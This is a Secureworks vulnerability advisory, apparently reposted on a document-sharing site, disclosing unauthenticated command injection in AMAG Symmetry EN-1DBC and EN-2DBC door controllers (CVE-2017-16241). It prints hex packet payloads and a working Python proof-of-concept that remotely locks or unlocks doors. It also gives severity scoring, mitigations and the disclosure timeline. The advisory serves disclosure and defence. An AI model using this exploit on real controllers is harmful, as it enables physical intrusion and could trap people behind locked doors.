Secureworks Security Advisory Incorrect access control in AMAG Technologies Symmetry Edge Network Door Controllers

Similar documents
Synology Security Whitepaper

Triconex TriStation Emulator Denial of Service

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

Cyber Security Advisory

Ruckus Wireless Security Advisory ID FAQ

CALSTRS ONLINE AGREEMENT TERMS AND CONDITIONS

Security Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors

TEST METHODOLOGY. SSL/TLS Performance. v1.0

Cyber Security Advisory

Security Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors

University of Pittsburgh Security Assessment Questionnaire (v1.7)

The Common Controls Framework BY ADOBE

Compass Security AG Vulnerability Disclosure Policy February 2nd, 2011

CompTIA Security+ (2008 Edition) Exam

Security testing ain t no functional testing

NSIF APPROVED DOCUMENT. Common Applications Requirements for SONET NE Security System

Secure Com Port Redirector User Guide

When the Lights go out. Hacking Cisco EnergyWise. Version: 1.0. Date: 7/1/14. Classification: Ayhan Koca, Matthias Luft

GE Fanuc Intelligent Platforms

Define information security Define security as process, not point product.

Anti-DDoS. FAQs. Issue 11 Date HUAWEI TECHNOLOGIES CO., LTD.

12 th January MWR InfoSecurity Security Advisory. WebSphere MQ xcsgetmem Heap Overflow Vulnerability. Contents

Frequently Asked Questions WPA2 Vulnerability (KRACK)

TCG Compliance TNC IF-MAP Metadata for Network Security Compliance Test Plan

Xerox Audio Documents App

Security Bulletin Relating to Worldwide Botnet Dialing H.323-Capable Systems

Pass4suresVCE. Pass4sures exam vce dumps for guaranteed success with high scores

Security Guide SAP Supplier InfoNet

Defense-in-Depth Against Malicious Software. Speaker name Title Group Microsoft Corporation

Vulnerability Management & Vulnerability Assessment. Nessus Attack Scripting Language (NASL). CVE databases, NVD database

Firewalls, Tunnels, and Network Intrusion Detection

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

C1: Define Security Requirements

Security Advisory Relating to Worldwide Botnet Dialing H.323-Capable Systems

Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities

UC for Enterprise (UCE) Management System (UNIVERGE MA4000)

One Identity Starling Two-Factor Desktop Login 1.0. Administration Guide

MWR InfoSecurity Security Advisory. IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability. 4th March 2010

Privilege Escalation via adbd Misconfiguration

May 2014 Product Shipping Configuration Change Notice

WIDS Technology White Paper

CYBER SECURITY POLICY REVISION: 12

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Privacy Policy. 1. Collection and Use of Your Personal Information

The Shortcut Guide To. Protecting Against Web Application Threats Using SSL. Dan Sullivan

Certification Report

Electronic Disclosure and Electronic Statement Agreement and Consent

Juniper Vendor Security Requirements

Cisco WebEx Best Practices for Secure Meetings for Site Administrators and Hosts

Knobs, Levers, Dials and Switches: Now and Then (please sir, may I have some more?)

Device Vulnerabilities in the Connected Home: Uncovering Remote Code Execution and More

Hackveda Training - Ethical Hacking, Networking & Security

BREACH DETECTION SYSTEMS COMPARATIVE ANALYSIS

Security Advisory Relating to OpenSSL Vulnerability Heartbleed on Various Polycom Products

KRACKing WPA2 in Practice Using Key Reinstallation Attacks. Mathy BlueHat IL, 24 January 2018

Network Access Control and VoIP. Ben Hostetler Senior Information Security Advisor

Virginia Commonwealth University School of Medicine Information Security Standard

Avast Customer & Technical Support Policy

Threat Modeling. Bart De Win Secure Application Development Course, Credits to

Windows Security Updates for August (MS MS06-051)

AhnLab Software License Agreement

ROBOCYBERWALL INC. External Penetration Test Report. September 13, 2017

MyCreditChain Terms of Use

MU2a Authentication, Authorization & Accounting Questions and Answers with Explainations

Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address :

Release Notes for Epilog for Windows Release Notes for Epilog for Windows v1.7

NVIDIA VOLTA DEEP LEARNING AMI

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Technical Guidance and Examples

Identity Theft Prevention Policy

Hosted Testing and Grading

Terms of Use. Changes. General Use.

Detecting MAC Spoofing Using ForeScout CounterACT

RBS Axis Products Management Web Interface Multiple Vulnerabilities of 9

JPCERT/CC Incident Handling Report [January 1, March 31, 2018]

Hik-Connect Mobile Client Software (ios)

Vulnerability disclosure

MWR InfoSecurity Security Advisory. Intersystems Caché CSP (Caché Server Pages) Stack Overflow. 17 th December 2009

mdns/dnssd Threat Model

Acceptable Use Policy

Privacy Breach Policy

Bank Infrastructure - Video - 1

Terms and Conditions 01 January 2016

NEXT GENERATION FIREWALL. Tested Products. Environment. SonicWall Security Value Map (SVM) JULY 11, 2017 Author Thomas Skybakmoen

Securing Apache Tomcat. AppSec DC November The OWASP Foundation

IACHR INDIVIDUAL PETITION SYSTEM PORTAL TERMS AND CONDITIONS OF USE

Mobile Security Fall 2013

Acceptable Use Policy

IBM Hosted Application Security Services - Website Scanning Platform

ETSI TS V6.1.0 ( )

NETWORK AND CERTIFICATE SYSTEM SECURITY REQUIREMENTS

SANS Institute , Author retains full rights.

FedRAMP: Understanding Agency and Cloud Provider Responsibilities

We will ask you for certain kinds of personal information ( Personal Information ) to provide the services you request. This information includes:

90% 191 Security Best Practices. Blades. 52 Regulatory Requirements. Compliance Report PCI DSS 2.0. related to this regulation

Acceptable Use Policy

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7

Tiger Scheme QST/CTM Standard

StorageGRID Webscale NAS Bridge Management API Guide

BCDC 2E, 2012 (On-line Bidding Document for Stipulated Price Bidding)

Transcription:

Secureworks Security Advisory 2017-001 Incorrect access control in AMAG Technologies Symmetry Edge Network Door Controllers Release date: December 9, 2017 Summary Incorrect access control in AMAG Technology Symmetry Edge Network Door Controllers enables remote attackers to execute door controller commands by sending unauthenticated requests to affected devices via serial communication over TCP/IP. An attacker with network access to vulnerable door controllers could remotely trigger door lock and unlock commands. In addition, an attacker could inject arbitrary ID badge information into the controller s internal database, allowing unauthorized entry using an illegitimate ID badge. Secureworks researchers discovered that several 1 Symmetry Edge Network Door Controller versions are affected: AMAG Technology EN-1DBC o Boot App Version: 23611 03.60 o STD App Version: 23603 03.60 AMAG Technology EN-2DBC o Boot App Version: 24451 01.00 o STD App Version: 2461 01.00 Incorrect access control High severity Incorrect access control in AMAG Technology Symmetry Door Edge Network Controllers enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to affected devices via serial communication over TCP/IP. By monitoring TCP network traffic between the legitimate AMAG Symmetry SMS physical access control server and the EN- 1DBC and EN-2DBC networked door controllers, Secureworks researchers were able to reverse engineer the basic data structure of the network communication. The following packet structure is associated with the unlock command being sent from AMAG Symmetry SMS: Packet data structure, ASCII:.01ZZ$Ud11A9 Packet data structure, Hex: 0230315a5a24556431314139 Node address:.01zz (0230315a5a) 1 Testing was not exhaustive across all versions of Symmetry products, so this issue may exist in additional versions. 2017 SecureWorks, Inc. All rights reserved. Page 1 of 6

Command: $Ud (245564) Reader port: 11 (3131) Checksum: A9 (4139) The unlock command packet was static across all tested EN-1DBC and EN-2DBC door controllers. By sending this data payload to the door controllers from a third-party system that was not associated with the physical access control software, Secureworks researchers were able to trigger the door controllers to unlock the associated locking mechanism. This attack does not require authentication. Secureworks researchers repeated this approach with several other identified commands. The researchers noted the use of the Ca and Cd commands after adding or removing an RFID badge from the access group associated with the tested door controllers. The RFID badge data was encoded but not encrypted. The researchers were able to reverse engineer and re-implement this encoding, allowing RFID badge values from a third-party system to be implanted without authentication. Secureworks researchers also tested the Vf and Ld commands and found them to be vulnerable. Additional commands were not thoroughly tested. Proof of concept (PoC) exploit #!/usr/bin/env python # # usage: python endbc-exploit.py c <lock unlock> -i <controller ip> # import socket import argparse import binascii import re # Unlock door # def unlock(ip, port): print "[*] Sending 'unlock' command to "+ip s = socket.socket(socket.af_inet,socket.sock_stream) s.connect((ip, port)) s.send('0230315a5a24556431314139'.decode('hex')) s.close # Relock door # def lock(ip, port): print "[*] Sending 'lock' command to "+ip s = socket.socket(socket.af_inet,socket.sock_stream) s.connect((ip, port)) s.send('0230315a5a244c6431314232'.decode('hex')) s.close if name == ' main ': parser = argparse.argumentparser(usage='./endbc-exploit.py -c unlock -i 192.168.1.1') parser.add_argument('-c', '--cmd', required=true, help='command to send to door controller') 2017 SecureWorks, Inc. All rights reserved. Page 2 of 6

parser.add_argument('-i', '--ip', required=true, help='ip of target door controller') parser.add_argument('-p', '--port', default="3001", type=int, help='target port on door controller (default: %(default)s)') args = parser.parse_args() ip = args.ip port = args.port print "[*] Targeting EN-1DBC at: "+ip+":"+str(port) if args.cmd == "lock": lock(ip,port) if args.cmd == "unlock": unlock(ip,port) Example packet captures The following packet capture screenshots show legitimate and illegitimate traffic between the Symmetry SMS server, an EN-1DBC, and the researchers third-party system. Figure 1 shows the unlock command (Ud) sent from the Symmetry SMS server at 192.168.100.51 to the EN-1DBC door controller at 192.168.100.87. Figure 1. Legitimate unlock command. (Source: Secureworks) Figure 2 shows the successful unlock command (Ud) sent from the researchers systems at 192.168.100.184 to the EN-1DBC door controller at 192.168.100.87. 2017 SecureWorks, Inc. All rights reserved. Page 3 of 6

Figure 2. Spoofed unlock command. (Source: Secureworks) Justification of assigned severity Severity: High CVSSv3 9.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L) Attack vector (AV): This attack can be performed via the network (N). Attack complexity (AC): The attack complexity is Low (L). Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges required (PR): The attacker does not require authentication (N) prior to attack, and therefore does not require access to settings or files to carry out an attack. User interaction (UI): The vulnerability can be exploited without any user interaction (N). Scope (S): This attack can allow an attacker with network access to bypass physical controls and gain access to a secured physical area, thus changing (C) the scope of affected resources. Confidentiality (C): The confidentiality of the device is not impacted by this vulnerability (N). Integrity (I): An attacker can inject fake card values, which can then be used to physically bypass the door. Because the primary function of a door controller is to help control access, this vulnerability has a High (H) impact on device integrity. Availability (A): By repeatedly issuing the lock command, an attacker may be able to temporarily deny entry or exit via a controlled door. As a result, an attacker could cause reduced performance or interruptions in resource availability on the device (L). Damage This vulnerability enables remote, unauthenticated attackers to issue commands to vulnerable controllers, including those that lock and unlock doors. This ability could cause physical safety hazards (e.g., locking 2017 SecureWorks, Inc. All rights reserved. Page 4 of 6

doors before a fire). The ability to inject false card values into vulnerable controllers could give attackers access to secured areas where they could conduct additional malicious activity. Reproducibility Exploitation of this vulnerability does not require unique information, so this attack is easy to reproduce. A simple unmodified Python script can perform the attack. Exploitability Exploitation is trivial because it does not require any unique conditions. Affected users Users of the AMAG Technology EN-1DBC and EN-2DBC controllers are vulnerable. These door controllers are common. Discoverability This vulnerability was trivial to discover and exploit. Security recommendations Enable the optional AES-256 encryption on EN-1DBC+ and EN-2DBC controllers. Ensure that Symmetry Security Management System (Symmetry SMS) software is fully updated. If possible, implement network segmentation to help isolate physical access-control devices such as door controllers. Vendor feedback AMAG Technology provided the following response: This vulnerability is an out of the box situation with default program settings. All AMAG products currently supported (which includes the EN-1DBC and EN-2DBC listed) include AES encrypted communications between network components if configured. Options include controller initiated communications which would prevent external attack of this nature and intrusion detection notification to the software. Disclosure timeline Date April 27, 2017 May 24, 2017 May 25, 2017 May 30, 2017 Action Secureworks attempts to contact AMAG and provides an initial draft of this advisory. Secureworks makes a second attempt to contact AMAG, attaching the advisory draft. An AMAG employee acknowledges the issue. Secureworks requests additional information, including expected remediation timeline. AMAG did not respond. 2017 SecureWorks, Inc. All rights reserved. Page 5 of 6

Date June 12, 2017 October 27, 2017 October 30, 2017 November 21, 2017 November 23, 2017 November 28, 2017 December 9, 2017 Action Secureworks repeats the request for additional information, including expected remediation timeline. AMAG did not respond. Secureworks notifies the CERT Coordination Center (CERT/CC) of the vulnerability. The CERT/CC attempts to contact AMAG but does not receive a response. MITRE assigns CVE-2017-16241 to the issue. Secureworks provides AMAG with additional notification of the public disclosure timeline, including a draft of this advisory. Secureworks received a second response from AMAG. Secureworks discussed the findings and disclosure timeline with an AMAG executive. AMAG stated they would notify their clients prior to the December 9 disclosure date. Secureworks publicly discloses the issue. PGP key This advisory has been signed with a Secureworks PGP key that is available for download at https://www.secureworks.com/~/media/files/keys/secureworksdisclosures.ashx?la=en. Disclaimer 2017 SecureWorks, Inc. All rights reserved. This advisory may not be edited or modified in any way without the express written consent of Secureworks. Permission is hereby granted to link to this advisory via the Secureworks website or use in accordance with the fair use doctrine of U.S. copyright laws. See the Secureworks terms of use at https://www.secureworks.com/termandconditions for additional information. The most recent version of this advisory may be found on the Secureworks website at https://www.secureworks.com. The contents of this advisory may change or be removed from the website without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. ANY USE OF THIS INFORMATION IS AT THE USER'S RISK. In no event shall Secureworks be liable for any damages whatsoever arising out of or in connection with the use or further publication or disclosure of this information. 2017 SecureWorks, Inc. All rights reserved. Page 6 of 6

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback